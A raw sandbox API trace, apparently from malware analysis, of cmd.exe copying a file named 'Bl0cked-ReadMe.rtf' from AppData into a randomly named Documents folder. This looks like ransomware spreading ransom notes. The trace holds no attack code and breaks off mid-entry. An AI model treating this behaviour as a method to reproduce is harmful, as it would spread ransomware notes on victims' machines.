[0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.691] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.692] GetConsoleTitleW (in: lpConsoleTitle=0x1e08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.693] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.693] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.693] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.693] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.693] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.693] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.693] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0141.693] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.693] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.693] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.693] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0141.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.697] GetFileType (hFile=0x7) returned 0x2 [0141.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf610 | out: lpMode=0x1cf610) returned 1 [0141.697] _dup (_FileHandle=1) returned 3 [0141.698] _close (_FileHandle=1) returned 0 [0141.698] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0141.698] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf5e0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0141.699] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0141.699] GetConsoleTitleW (in: lpConsoleTitle=0x1cf410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.699] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0141.699] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0141.699] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0141.699] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0141.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.700] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cef74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef74) returned 0x1e0e90 [0141.700] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0141.700] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0141.700] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0141.700] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cde80, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0141.701] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] GetFileType (hFile=0x54) returned 0x1 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1cded8 | out: lpFileSizeHigh=0x1cded8*=0x0) returned 0x1632 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0141.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.701] GetFileType (hFile=0x4c) returned 0x1 [0141.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.701] GetFileType (hFile=0x4c) returned 0x1 [0141.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.703] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.704] GetFileType (hFile=0x4c) returned 0x1 [0141.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.704] GetFileType (hFile=0x4c) returned 0x1 [0141.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.252] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.252] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.253] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.253] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.255] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.255] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.256] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.256] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=4) 